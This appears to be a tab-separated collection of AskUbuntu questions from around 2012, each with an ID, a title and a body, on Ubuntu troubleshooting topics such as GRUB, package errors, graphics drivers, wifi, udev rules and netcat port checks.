121203	how to get a live cd to auto install software into ubuntu	i should note , i used active iso in windows 7 to burn the disc ( samurai-wtf ) i am required to load into ubuntu to run penetration testing..anyway , i am using a virtual machine..latest version of ubuntu 10.11 and can not get the software to run.. is it the iso burner ? i would n't think so , but ubuntu is only reading it as a data disc.. i even downloaded a second iso and burned again to ensure not a bad iso..short of running the hashes , im sure this is good software . do i need to do command line via terminal ? sorry , sleepy , frustrated student ... thanks in advance..
121207	trim on encrypted ssd -- urandom first ?	my understanding ( i 'm not sure i 'm getting this all right ) is that if one uses trim on an encrypted ssd , it defeats some of the security benefits , because the drive will write zeros to empty space ( as files are deleted ) . see : http : //www.askubuntu.com/questions/115823/trim-on-an-encrypted-ssd and : http : //asalor.blogspot.com/2011/08/trim-dm-crypt-problems.html my question is : from the perspective of the performance of the ssd and the functioning of trim , would it therefore be better to simply zero out the ssd , before setting up an encrypted system , rather than writing random data to the drive , with urandom , as one usually does ? would this basically leave one with the same level of security anyway ? and more importantly , would it better enable the trim functionality to work as intended , with the encrypted ssd ?
121212	using a bootable live cd disk image mounted on the hard drive	so in essence i want to mount the contents of a bootable cd image , like ubuntu rescue remix , to a partition of the hard drive , so i can have an entry in grub to boot to the contents of that disk , http : //www.linuxquestions.org/questions/linux-general-1/boot-iso-image-from-hard-disk-294744/ , details a similar process used for a knoppix cd , is there a way to do this for ubuntu disks .
121217	black flash player screen in youtube in firefox on ubuntu 11.10	i have been unable to view any videos online since the latest adobe flash player update . when i go to view a video on youtube there is only a black screen in place of the normal player .
121222	kernel source version number does not match	i am using ubuntu 11.10 . when i type 'uname -r ' in the terminal , i get : 3.0.0-15-generic i want to download the kernel source for the particular kernel version i am running . when i look on kernel.org , and then look inside kernel.org/pub/linux/kernel/v3.0/ i can only find source tarballs by the name of linux-3.0.x.tar.gz . my 'uname -r ' has an extra '0 ' in it . am i looking in the wrong place ? is my kernel not a mainline one ?
121226	how to completely remove a oracle jdk that did n't install properly ?	i recently installed a oracle jdk from a webupd8ppa on ubuntu 12.04 beta , but apparently it did n't work out , and now it is giving me errors at every update or install i make , even after deactivating the ppa from my sources . this is what i get when i try uninstalling from usc : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 295120 files and directories currently installed . ) removing oracle-java7-installer ... update-alternatives : error : unknown argument `cdrom' dpkg : error processing oracle-java7-installer ( -- remove ) : subprocess installed pre-removal script returned error exit status 2 no apport report written because maxreports is reached already downloading ... -- 2012-04-12 13:13:21 -- http : //download.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz rsolution de download.oracle.com ( download.oracle.com ) ... 203.13.161.233 , 203.13.161.234 connexion vers download.oracle.com ( download.oracle.com ) |203.13.161.233|:80 ... connect . requte http transmise , en attente de la rponse ... 302 moved temporarily emplacement : https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz [ suivant ] -- 2012-04-12 13:13:21 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz rsolution de edelivery.oracle.com ( edelivery.oracle.com ) ... 173.223.150.174 connexion vers edelivery.oracle.com ( edelivery.oracle.com ) |173.223.150.174|:443 ... connect . requte http transmise , en attente de la rponse ... 302 moved temporarily emplacement : http : //download.oracle.com/errors/download-fail-1505220.html [ suivant ] -- 2012-04-12 13:13:22 -- http : //download.oracle.com/errors/download-fail-1505220.html connexion vers download.oracle.com ( download.oracle.com ) |203.13.161.233|:80 ... connect . requte http transmise , en attente de la rponse ... 200 ok longueur : 5307 ( 5,2k ) [ text/html ] sauvegarde en : ./jdk-7u3-linux-i586.tar.gz 0k ... .. 100 % 4,94m=0,001s 2012-04-12 13:13:22 ( 4,94 mb/s ) - ./jdk-7u3-linux-i586.tar.gz sauvegard [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-i586.tar.gz oracle jdk 7 is not installed . dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java7-installer error in function : i also tried `` remove completely '' from synaptic but it does n't work either . thank you for your help in advance !
121228	laptop with intel graphics : external vga monitor only gets signal on boot ( no `` hot plugging '' )	i am able to get an external vga monitor ( or projector ) to work if i start my laptop with it connected . however , if i start the laptop with it disconnected there is no signal on the external . the displays screen shows the external , and thinks that it is active , but there is no signal being sent to it . this has been a persistent problem since 10.04 ( i am now on 12.04 ... . each upgrade hoping something is improved ) . i should note that even when it works ( starting with display connected ) , displays still says the monitor is `` unknown '' ( but it sends the signal ) . for the correct resolution to display , i have had to add a few xrandr lines for my monitor to my .xprofile file ... otherwise resolution is limited to default 1024x768 . so , resolution issues can be worked around , but the main issue is that the external does n't get a signal without starting the machine with it connected . i have tried : adding i915.modeset=1 to grub ( also i965.modeset=1 since someone posted that this helped even though lshw shows i915 ) adding following ppa and doing a dist-upgrade : sudo add-apt-repository ppa : xorg-edgers/ppa here are the details : laptop : toshiba tecra m10 lspci listings for video : 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 4 series chipset integrated graphics controller [ 8086:2a42 ] ( rev 07 ) sudo lshw -c video listing : *-display:0 description : vga compatible controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 07 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : ff400000-ff7fffff memory : e0000000-efffffff ioport : cff8 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 07 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : ffc00000-ffcfffff '' system info '' shows my graphics as the following mobile intel速 gm45 express chipset x86/mmx/sse2
121229	ubuntu.sh on android phone	so today i noticed something weird on my phone . i used a terminal emulator to see what i could do with it , and noticed that there is a file called ubuntu.sh . i tried to run it and got all sorts of permission denied errors , and then i decided to root my phone . but now i 'm nervous to run it , does anyone know what it does or why it is there ? edit i forgot to mention that i have an at & t morotola atrix 4g running android 2.3.6 . also when i use the app sshdroid to go into my phone from my ubuntu machine , i 'm greeted with this : '' the programs included with the ubuntu system are free software ; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright . ubuntu comes with absolutely no warranty , to the extent permitted by applicable law . to access official ubuntu documentation , please visit : http : //help.ubuntu.com/ '' also , here are the contents of ubuntu.sh # ! /bin/sh export path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin export ld_library_path=/usr/lib : /usr/local/lib # make sure no left-over pidfiles , etc . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # rm -fr /var/run/* rm -fr /var/lock/* chmod 666 /system/usr/keychars/* rm -f /tmp/tab* mkdir -p /home/adas/desktop chmod 755 /home/adas/desktop chown -r adas.adas /home/adas/desktop [ -x /usr/bin/firefox-install-profile ] & & /usr/bin/firefox-install-profile [ -x /usr/local/bin/check-citrix-certs.sh ] & & /usr/local/bin/check-citrix-certs.sh [ -x /usr/bin/migrate-webapps ] & & /usr/bin/migrate-webapps # boot scripts # # # # # # # # # # # # # # /etc/init.d/rc s # lock down /var for cts # # # # # # # # # # # # # # # # # # # # # # # # chown root.adas /var/tmp chown root.adas /var/lock chmod 775 /var/tmp chmod 775 /var/lock chmod 666 /dev/socket/dbus chmod 666 /dev/null # runlevel 2 scripts # # # # # # # # # # # # # # # # # # # # /etc/init.d/rc 2 cp /sdcard/*.lic /data/ chmod 666 /data/*.lic this is really strange , any ideas ?
121233	how can i change my login screen resolution when connected to my monitor ( 12.04 )	i have my laptop connected to a monitor via vga . when i start the computer up , the login screen shows on both the monitor and laptop screens , and is not the correct resolution . i would like it to show up only on the monitor screen , and to be 1920x1080 . any suggestions ?
121237	how to chat between 2 ubuntu machines in network ?	i want to know that how we can chat between 2 ubuntu machines in a network . there are many messengers but we are prohibited from using those who send the files . any command line chat messenger for 2 ubuntu in network ? or gui will also work .
121241	how to update all the installed software in ubuntu without using any ppa ?	i 've got many softwares installed . but when the new version is released i 'm not getting notified from the application that an update is available . and i found that in most of ubuntu applications the update option is not available . i should wait for the next release for an updated version of the software . i 've been updating mozilla using the packages available from their ppa . in ubuntu is there any way to update the softwares without using any ppas ? please do n't recommend build from source method since i do n't like to do all those weird stuff like configuring the things manually etc .
121243	how to install .debs in a folder using a single command ?	hello i 'm using ubuntu 12.04 beta 2 and i 've got the .debs of the softwares i had been using in oneiric . i wan na install them all ! ! but the problem is i ca n't install them one by one [ due to shortage of time and patience ] . is there any command to install all the .debs placed in a single folder once and for all ! !
121252	disable spell checker in pidgin	how can i disable spell checker in pidgin ? any idea ? i searched on the web , but did n't find anything .
121253	best place to request ubuntu for a minor improvement ( in unity dash search )	which is the best place to request ubuntu for a minor improvement ? my request feature is this : in ubuntu dash when i search for `` upd '' it gives me update manager and some other files . now when i click enter by default the first entry will be selected . can we make this a slightly better experience by highlighting the first item in search results which will be selected by default if we press enter - just like in gnome shell search for upd in unity dash search for upd in gnome-shell if you notice , update manager is highlighted by default in gnome shell and appears more intuitive . can we implement the same in unity ? sorry for posting this in askubuntu . i just wanted to know which is the best place to discuss this . thanks
121254	can i run alsa and pulse side by side ? i think there is some problem with the alsa ! my ubuntu login sound and alert sound are not working ?	i think i have alsa driver installed . pulse not working may be i dont have it installed . not sure if i can run pulse and alsa . i had to configure each application prior to work which use pulse . ( smplayer by default select pulse . i had to change that ) i know a little about these . so if the question is stupid then please help me . smplayer always showing a cross ( x ) icon in front of speaker icon as it is disabled , though im playing sound .
121256	switching between ethernet interfaces on ubuntu 10.04 server	i have ubuntu 10.04 `` server '' installed on a system with two ethernet ports . i use only one at a time . i wanted to know if i can switch between ports without using ifup and ifdown every time . that means when i connect my lan cable on eth0 it should work and it does . but when i disconnect the lan cable and connect it on eth1 i have to ifdown eth0 and only then it works . in my /etc/network/interfaces file i have configured both eth0 and eth1 . there is no problem other than i have to switch it manually with ifdown and ifup every time .
121258	evolution install	i 'm trying to install evolution and the ubuntu software manager tries to install it and just stops . evolution gets pinned to the launch bar but wo n't start . i then tried from the command line using `` sudo apt-get install evolution evolution-mapi '' but that fails with the following output : the following packages will be upgraded : gnome-icon-theme gnome-icon-theme-symbolic libasn1-8-heimdal 3 upgraded , 30 newly installed , 0 to remove and 481 not upgraded . need to get 2,877 kb/20.7 mb of archives . after this operation , 60.8 mb of additional disk space will be used . do you want to continue [ y/n ] ? y err http : //us.archive.ubuntu.com/ubuntu/ precise/main libevolution amd64 3.2.3-0ubuntu5 404 not found [ ip : 91.189.92.183 80 ] ... truncated because of the dumb link limit as i 'm a new user ... failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_3.2.3-0ubuntu5_amd64.deb 404 not found [ ip : 91.189.92.183 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
121263	screen saver on different monitors ?	can i have different screen savers on different monitors ? i have three monitors configured as : [ desktop ] -- -main board -- -- monitor 1 | |- vga card - monitor 2 | `- vga card - monitor 3 mainly i 'm working with monitor 2 , and i want the screen saver turn off monitor 1 , 3 for 30 minutes timeout . and turn on each monitor when mouse in .
121265	get the 11.04 ubuntu icon back	i really liked the ubuntu icon on 11.04 . is there any way i can get that back in 11.10 ? thanks .
121272	is there any folder structure and file based explanation of ubuntu	i need a detailed folder structure and file based explanation of ubuntu . an article or a video may be .
121274	ati move the unity bar to another screen using binary driver	i must say , i 'm really pleased with the 12.04 performance . the only real issue i had is that i needed a custom screen orientation and the binary driver had no way to move the unity launcher , as far as i could tell . i found a solution , so i 'm asking the question . this way more people can benefit from it .
121275	unmet dependencies when installing gimp	i ca n't install gimp , it says something about unmet dependencies . the following packages have unmet dependencies : gimp : depends : python-gtk2 ( > = 2.8.0 ) but 2.24.0-2 is to be installed depends : libc6 ( > = 2.11 ) but 2.13-20ubuntu5.1 is to be installed depends : libfontconfig1 ( > = 2.8.0 ) but 2.8.0-3ubuntu2 is to be installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but 2.24.0-1ubuntu1 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.30.0-0ubuntu4 is to be installed depends : libgs9 ( > = 8.61.dfsg.1 ) but 9.04~dfsg-0ubuntu11.5 is to be installed depends : libgtk2.0-0 ( > = 2.24.0 ) but 2.24.6-0ubuntu5 is to be installed depends : libgudev-1.0-0 ( > = 147 ) but 1:173-0ubuntu4.2 is to be installed depends : libjpeg62 ( > = 6b1 ) but 6b1-1ubuntu2 is to be installed depends : librsvg2-2 ( > = 2.14.4 ) but 2.34.1-2 is to be installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu3 is to be installed
121279	ubuntu gnu grub settings	i 'm not the kind of user with programming skills , so i do n't know much about configuring grub with commands . my problem is that i have 8 or 9 starting options in grub menu , and i would like them to be just the 2 , being my operating systems . i have windows 7 and ubuntu 12.4 . how can i delete the rest of the options ? thank you !
121283	ca n't access ftp server	before installing ubuntu i used windows.my internet provider has a ftp site . in windows i just open a browser and visit the ftp site.but i can access the ftp site in ubuntu.in firefox it says
121285	touchpad only found occasionaly	only , like every fifth restart is my touchpad found by ubuntu 11.10 . i suspect this might be a hardware failure , but i 'm not sure so i throw this question out here . i do n't run windows on this computer so ca n't check like that . anyway , the computer is a dell vostro 1310 and the touchpad is an `` alpsps/2 alps glidepoint '' . if i check the /proc/bus/input/devices file the touchpad is only listed those times it works . otherwise it 's not visible in this file . any clue ?
121286	can not install packages . `` warning : untrusted versions ... '' plus `` method driver /usr/lib/apt/methods/http could not be found ''	judging from internet forums , these errors appear to be popular when attempting to install packages : steve : ~ $ sudo aptitude install examplepackage the following new packages will be installed : examplepackage examplepackage-common { a } 0 packages upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 1,834 kb of archives . after unpacking 7,631 kb will be used . do you want to continue ? [ y/n/ ? ] warning : untrusted versions of the following packages will be installed ! untrusted packages could compromise your system 's security . you should only proceed with the installation if you are certain that this is what you want to do . examplepackage examplepackage-common do you want to ignore this warning and proceed anyway ? to continue , enter `` yes '' ; to abort , enter `` no '' : yes e : the method driver /usr/lib/apt/methods/http could not be found . e : the method driver /usr/lib/apt/methods/http could not be found . e : internal error : could n't generate list of packages to download i followed this post by uninstalling ubuntu-keyring . but i can not reinstall ubuntu-keyring or ubuntu-minimal -- the above errors reappear . in fact , i do n't even seem to have apt ( i must have caused this along the way by trying a bad solution , or maybe a clean ) : steve : ~ $ sudo apt-get update sudo : apt-get : command not found aptitude works , but i ca n't install apt : steve : ~ $ sudo aptitude install apt the following new packages will be installed : apt 0 packages upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 1,046 kb of archives . after unpacking 3,441 kb will be used . e : the method driver /usr/lib/apt/methods/http could not be found . e : the method driver /usr/lib/apt/methods/http could not be found . e : internal error : could n't generate list of packages to download ... or update steve : ~ $ sudo aptitude update e : the method driver /usr/lib/apt/methods/http could not be found . e : the method driver /usr/lib/apt/methods/http could not be found . e : the method driver /usr/lib/apt/methods/http could not be found . i tried this post . did n't help . to summarize , the main problem is that i can not install anything . while attempting to fix the problem , the other aforementioned errors occurred . can you help me fix this error ? feel free to ask if you need more information . stats : steve : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 11.10 release : 11.10 codename : oneiric
121288	installed 12.04 on lenovo x120e now i ca n't boot	here 's my current boot info summary http : //paste.ubuntu.com/926066 i installed 12.04 after deleting /usr/lib/ubiquity/plugins/ubi-webcam.py and it worked once . i did n't like 12.04 so i formatted that partition and reinstalled 11.10 . at this point both installs have worked fine using the ubiquity partitioner to install using efi . with 11.10 reinstalled , the os is not found by the bios . i reinstalled 12.04-same . i chose to let ubuntu delete everything and install 12.04 on my drive and it installed using normal grub-pc . i installed again with a new partition table using efi and still nothing . i do n't know what to do now . i 've used boot-repair to set it in efi and normal mode and it makes no difference . it wo n't boot using efi or legacy and for some reason now it wo n't start ubuntu from a live cd if the computer has been on long enough to install the system . it flashes a heat warning above 92c then shuts down while the initial ubuntu splash screen is displayed . i have to wait and try again . this never has happened before and the computer is not hot . every side and the air coming from the fan are exactly as normal . can anybody help me out with this or possibly recommend a different distro that i could use on my lenovo thinkpad x120e that might actually boot ?
121289	does adding an partition in windows harm linux partitions ?	i have a dualboot of windows 7 and ubuntu . now i want to add an extra partition in windows with the internal partition manager . but does this hold any danger for the existing linux partitions ? i mean , can this do any harm to my linux partitions in a way that it is wiped or something like that ? or should i use another program like gparted ? also , when doing this via windows , do i only need to shrink the first partition and then add an additional one ? thanks
121302	how to adjust the brightness control in ubuntu 12.04 ?	i have vaio sony laptop nvidia , and when i use fn f5 , f6 i can see the volume in the screen changes , but that does n't affect the screen : ( this problem was with me in ubuntu 11.10. how to adjust the brightness control in ubuntu 12.04 ? i 'm wondering why the didnt fix it meanwhile many users have this issue ? ? ? ? ? please help because i cant use my laptop with 100 % brightness everyday : (
121304	start script when connecting phone through usb	trying to run a script when my phone is plugged in via usb , a made a udev rule looks like this in /etc/udev/rules.d/85-lazydroid.rule attrs { idvendor } == '' 22b8 '' , attrs { idproduct } == '' 428c '' , run+= '' /home/joel/.lazydroid '' and the script .lazydroid looks like this : # ! /bin/bash exec adb forward tcp:8080 tcp:8080 & exec chromium-browser 127.0.0.1:8080 -- new-window & the script itself runs fine . the trick is i ca n't get the script to run up on insertion of the phone . and it 's the right id according to : lsusb | grep motorola bus 002 device 042 : id 22b8:428c motorola pcs any ideas ? [ edit ] ok , know i know the udev rule is running , creates the symlink , made som changes to the rule , see below : subsystem== '' usb '' , attrs { idvendor } == '' 22b8 '' , attrs { idproduct } == '' 428c '' , symlink+= '' phone '' , run+= '' /bin/sh /home/joel/.lazydroid.sh '' but still the script wont run . and still if i run i separately it runs perfect .
121310	is pidgin bugged ? i can not set it up for facebook	i 've tried almost all options and used this guide ( https : //wiki.archlinux.org/index.php/pidgin # facebook_xmpp ) to set up pidgin for my facebook acccount , but it is simply impossible . at the username section i am using my actual username ... .not the long copied link from facebook ... so that can not be the issue . is there anyone out there who had had issues of the same type ? thanks
121314	adobe flash not being recognized on certain websites	i have adobe flash plugin v11.2r202 in firefox 11.0 , on kubuntu 11.10 64-bit . flash works flawless on youtube . however , certain websites claim that i need a more recent version of flash player . that is , of course , a wrong assumption . because i have the latest version installed . also , i tried firefox add-on `` flash aid '' . it did n't help . for example , on this website : http : //htwins.net/scale2/ it says `` you need a more recent version of adobe flash player . '' whereas in chromium or opera , it works . about : plugins contains this information about flash content : shockwave flash file : libflashplayer.so version : shockwave flash 11.2 r202 mime type ... ..description ... ..suffixes application/x-shockwave-flash ... ..shockwave flash ... ..swf application/futuresplash ... ..futuresplash player ... ..spl what is the problem there ?
121317	my laptop hangs a lot	my laptop is 1g ram and 120g hard-disk 1.68hz processor , i 've both ubuntu and windows7 on my machine for the last few days , my laptop , running ubuntu 11.10 has been hanging a lot . a lot of the time , the touchpad wo n't work for unknown reasons , and i have to connect a usb mouse to be able to move the pointer on the screen . when browsing the web , the browser hangs a lot , and i have to restart the laptop to refresh it . i know that there is a hotkey to force ubuntu to refresh when it hangs , but it does n't work here.these problems happens only on ubuntu not on windows 7 ... how do i make ubuntu light and fast ? help me , please .
121319	how to install gallium 0.4 on amd rv620 ?	been trying to install gallium 0.4 on amd rv620 in a new install of ubuntu 11.10 x86_64 , but i have n't got any idea of how to accomplish this . i had it installed before , and working , but now i ca n't . any help is appreciated . thanks edit : actually the default xorg drivers are gallium 's . if one types : glxinfoat the terminhal you are greeted with the info that mesa-utils are not installed . if one installs mesa-utils typing sudo apt-get install mesa-utilsat the terminal and retyping glxinfo | grep -i galliumat the terminal one gets the correct info . the same info can also be obtained from the system info gui after doing the outlined above . greetings from this 'tumbleweed ' ...
121330	how to install the latest java openjdk version ?	my system is ubuntu 10.04.4 ( lts ) i know there is openjdk `` 1.6.0_24 '' the version in ubuntu is `` 1.6.0_20 '' how do i install the latest version of the openjdk available ?
121331	trying to access centralized executable and attendant library file from anywhere in the file tree	i 'm trying to centralize my executables and libraries but i still want to be able to execute an input file from anywhere in the file tree without having to copy in the executable and the library every time . now i centralized everything in /home/hobbsfolder/bin added path= $ path : /usr/lib/pvm3/lib : /home/hobbsfolder/bin/ to the .bashrc . checking with echo $ path shows the expected path . starting the executable from a random folder works , as long as the library is placed in the folder , where the computation is started . so , for some reason the system finds the executable but not the library in /home/hobbsfolder/bin/ . i tried placing it in /usr/local/lib and running ldconfig , which to my understanding is supposed to generate a link , but ldconfig -v shows no such thing . i do n't have access to the binaries so i ca n't recompile anything . the system classifies the file-type as unknown . is there any correct place for placing external libraries ? what can i do to make the system understand that this is not just some random text-file or something and it is supposed to look in this folder when i execute that executable ?
121334	extract mail attachments and body from a .msg file	i 'm developing a plugin for a dms under ubuntu 10.04 . there is the need to extract mail attachments and body from uploaded .msg files . for those who do n't know .msg is a ms outlook file format . on windows we used a .msg extractor but on ubuntu i googled for hours and still have n't found anything . there is one serious issue here : .msg is microsoft technology and most .msg extractors use outlook and .net to get those attachments and body . do you know any workaround to make things work on a ubuntu machine ?
121335	both ipv4 and ipv6 at the same time over dsl connection ?	let me describe my situation : while i connect computer with the wire , i 've got an ipv6 address automatically , there 's a `` wired connection '' tab in network manager , and i can access an website that support ipv6 ( google , facebook , twitter ... ) with a hosts file , or use the proxy like google.com.sixxs.org but if i want to access the whole internet , i have to create a dsl connection with username and password that isp gave me . but after i change my connection into this dsl connection , i can not access website over ipv6 , even there 's the site 's ipv6 address in /etc/hosts , then i realize that i lose my ipv6 connection , because the ping6 says connect : network is unreachable . the problem is , there 's no ipv6 tab or options about ipv6 in the configure of dsl connection . it feels like i can only use one connection at the same time , but the dsl does n't support ipv6 and the wired connection does n't support ipv4 ( i mean , there 's no way to input the password the isp gave me ) maybe make somebody uncomfortable , but when i work in ms windows , there 's no such problem , ( maybe just feel like ) i can access v4 and v6 at the same time . so how to solve with this ? thanks a lot . i 'm in 11.10 + gnome3
121338	questions on creating a multiboot cd/dvd	i just found a way which is used to crate a multiboot ( multiple disto ) on a cd/dvd . i have found it from here multicd.tuxfamily.org . i followed all the steps given on the site but i am stucked after multicd.sh extracts the iso . it downloads a file syslinux-4.05.tar.gz which has a size of approx . 6.14 mb . the download always fails and thus the .iso is not created . i separately download that file . now how can i tell the multicd.sh to not download the file but use this file which i downloaded . please help ... ..
121342	can anyone recommend twitter client that support sock5 proxy ?	i have already tried gwibber , twitux , destroy twitter , smuxi , gtwitter , choqok , qwit and hotot . only hotot could configured sock5 proxy but not all traffic over sock5 ( i captured packets using wireshark and i found images link not be included . )
121343	how do i always run in low graphics mode ?	how do i always run in low graphics mode ? in normal mode my computer crashes unexpectedly every now and again which is very frustrating when work is lost . after a crash , it gives me the option to log in using the low graphics mode . in this mode , my computer never seems to crash . so does anyone know how i can always start in low graphics mode ? i get this problem in ubuntu 10.04 .
121348	updating and supporting the use of the cinnamon desktop	i have been reading this q & a : how do i install the cinnamon desktop ? it looks like something i might be interested in . however , i have some concerns about support - that is software updates and how they impact using this desktop . i 'm trying to understand how this is to be supported . will the community or canonical provide support this or at least provide updates for it through the official repositories - especially since 12.04 is a lts release ? my concerns are what could happen when i use update manager to get the latest software and possible impacts . hopefully someone can guide me through this .
121352	how to change circular icon to indicate chosen session in unity-greeter ?	in precise ( 12.04 ) , when i login to lightdm , using the unity-greeter , there 's a white circle by my name . for the standard des like unity or xfce , the circle has a representative icon ( ubuntu symbol or little mouse resp. ) . i have a session for awesome window manager which was added when i installed awesome , but it just shows a blank white circle . i 'd like to know how to add an icon to it , or at least some indicator , as unity-greeter does n't show you what session is set until you click on the circle . i found another question about changing the session names . the answer for it said to change the names in the desktop files in /usr/share/xsessions . unfortunately , while there is an icon field in those desktop files , they are all blank ( caveat : i no longer have unity installed , so maybe the unity one would not be blank . but the xubuntu desktop file has it blank even though the icon shows in unity-greeter ) . update : here 's the png i use as a badge for awesome . it 's not great , but looks reasonably nice : [ ]
121355	wifi disabled due to hardware switch . not re enabling . what should i do ?	i 'm using ubuntu 11.10 on dell inspiron mini 1018 . i disabled the wireless network and it does not enable again . it reports that wireless is disabled by hardware switch . pressing the hardware switch and any combinations on the keyboard has no response . neither does sudo rfkill unblock all have any effect . rfkill list gives the following results : 0 : hci0 bluetooth ... ... ... .. 1 : dell-wifi : wireless lan soft blocked yes hard blocked yes 2 : dell bluetooth ... ... ... .. 3 : phy0 ; wireless lan soft blockes no hard blocked ye sudo iwconfig wlan0 gives : ieee 802.11bgn essid off/any mode : managed access point : not associated tx-power=off retry long limit:7 rts thr=2347 b fragment thr : off power management : on sudo lshw -c network returns : *network disabled ... ... ... ... ... ... .
121357	organize desktop by name in a script	i 've made a script to rotate my tablet , but after rotation the desktop icons are out of range ( first image ) and i have to manual click on 'organize desktop by name ' ( second image ) . i want that my script automatic organizes the desktop like second image , any idea ? thanks .
121358	how do i update an intel motherboard bios using ubuntu ?	i 'm using intel dg41rq motherboard with intel core 2 duo e7400 - 64-bit architecture @ 2.80ghz . is there any way to update my bios ? i am using ubuntu 12.04 .
121363	how do i set up my ubuntu server to let my mac connect with ftp ?	i have a server running ubuntu server 10.04 , and i installed vsftpd on it . now , i am able to connect to it with only one program which is for windows only ( bleh ) the program is winscp . i can not connect to the server with any other application , such as the ubuntu connect to server , mac connect to server , filezilla , web browser , or anything that is not winscp . i need to be able to connect with other applications because i mainly use a mac to manage the server . i do n't want to install wine on my mac .
121365	is nat iptables available in 11.04 ?	i have an ubuntu 11.04 . i wanted to play around with iptables rules . but i do n't see it installed . when i did : sudo iptables -t nat -f chain this is what it returned : iptables v1.4.10 : ca n't initialize iptables table `-nat ' : table does not exist ( do you need to insmod ? ) perhaps iptables or your kernel needs to be upgraded . so is nat table not available ?
121366	how can i automatically mount an ntfs partition in lubuntu on startup ?	i run windows on a ntfs partition and lubuntu 11.10 on the other . i want to access the thunderbird profiles on the ntfs partition when i 'm using lubuntu . but i ca n't mount the ntfs from the beginning with fstab ( tried some manual editing and default parameters using mount-manager ) as every time i rebooted , an error occurred ( at the lubuntu loading screen i had to press a key for ignoring the mounting and continue booting ) . when i start the system without mounting via fstab , i get read-access in the file manager . the hdd is obviously mounted as soon as i 've clicked on it in my places . it 's a 120 gb ssd by the way with windows xp installed . so what could i do to still auto-mount my ntfs ?
121372	how to remove geoclue-master ?	looking in system monitor i saw a process called geoclue-master . as far as i can tell , this reports my precise location to applications and the internet . this computer is sitting in the same office all the time so i have no need whatsoever for such a thing , and would rather have the memory and processor cycles that this unnecessary service uses up - however small - free for things that i do need and want . i could not find instructions for disabling and removing this service so i renamed the file , but then the calendar disappeared from the notification area . is there a way to remove this service but leave the calendar ? i 'm using 11.10 .
121373	/etc/lightdm/unity-greeter.conf file missing	i have no /etc/lightdm/unity-greeter.conf file . but there is /etc/lightdm/lightdm.conf and /etc/lightdm/users.conf but there is n't a background=path/to/image line in either of those files . related : how do i change the wallpaper in lightdm ?
121376	why does '~ $ nc -z t43 1-1024 ' not produce any output although '~ $ ping t43 ' is successful ?	why does '~ $ nc -z t43 1-1024 ' not produce any output although '~ $ ping t43 ' is successful ? '~ $ nc -z -v t43 1-1024 ' prints 'connection to t43 22 port [ tcp/ssh ] succeeded ! ' and 'nc : connect to t43 port 1000 ( tcp ) failed : connection refused . ' 'man nc ' : `` port scanning : it may be useful to know which ports are open and running services on a target machine . the -z flag can be used to tell nc to report open ports , rather than initiate a connection . for example : ' $ nc -z host.example.com 20-30 ' .
121377	need to configure 4 serial ports virtualbox guest win machine ( my host is ubuntu 11.10 )	i have an application that run 's on winnt and requires the apci-7500 card ( a 4-multiport serial card ) , so i 've installed the winnt thru virtualbox , but as i try to configure the serial ports i notice that virtualbox shows only 2 serial ports , only 2 tabs in the ports configuration section.how can i add the other 2 ports and configure them . my host is ubuntu 11.04 my guest is winnt my virtualbox version is 4.0.4_oser70112 i 'll appreciate any help . thanks in advance . i 've followed these threads but still get no light in this issue how to access serial ubuntu host serial port on virtualbox guest os ca n't access host serial port on virtualbox winxp
121379	how do i install wallpapers from older releases ?	i have currently installed 12.04 and i really like the wallpapers of 11.10 . how do i install it in 12.04 ?
121382	what is the difference between -exec with ' { } ' ' ; ' and -exec with { } / ; ?	while trying my hand at writing some bash scripts i 've come across various usage of the -exec parameter . in my context , i 'm using it after the find command . this guide states to use { } / ; after the exec in order to pass the file name and to escape the ; so that command properly terminates . this forum post shows the use of ' { } ' ' ; ' instead of { } / ; . i tried out both methods on ubuntu 11.04 and only the one with the single quotes is working correctly . is there a difference between linux versions which causes this ? are they interchangeable ? is one preferred over the other ?
121385	how to show 'arrows ' for windows in other workspaces in the launcher ?	previously in ubuntu 11.10 , when i had libreoffice open in several workspaces , i would click on the libreoffice icon to get an exposăš-esque preview of all windows from all workspaces . with ubuntu 12.04 , this no longer seems to be the case . one might argue that this is better , but the usage of clicking that icon and picking the right window has become part of my workflow , and i 'm very much missing that feature now . how do i allow the unity launcher to show all open windows of one application , regardless of their position or workspace ?
